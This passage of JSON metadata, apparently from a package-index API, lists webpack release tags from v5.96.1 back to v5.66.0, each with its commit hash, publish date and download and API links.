anifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/w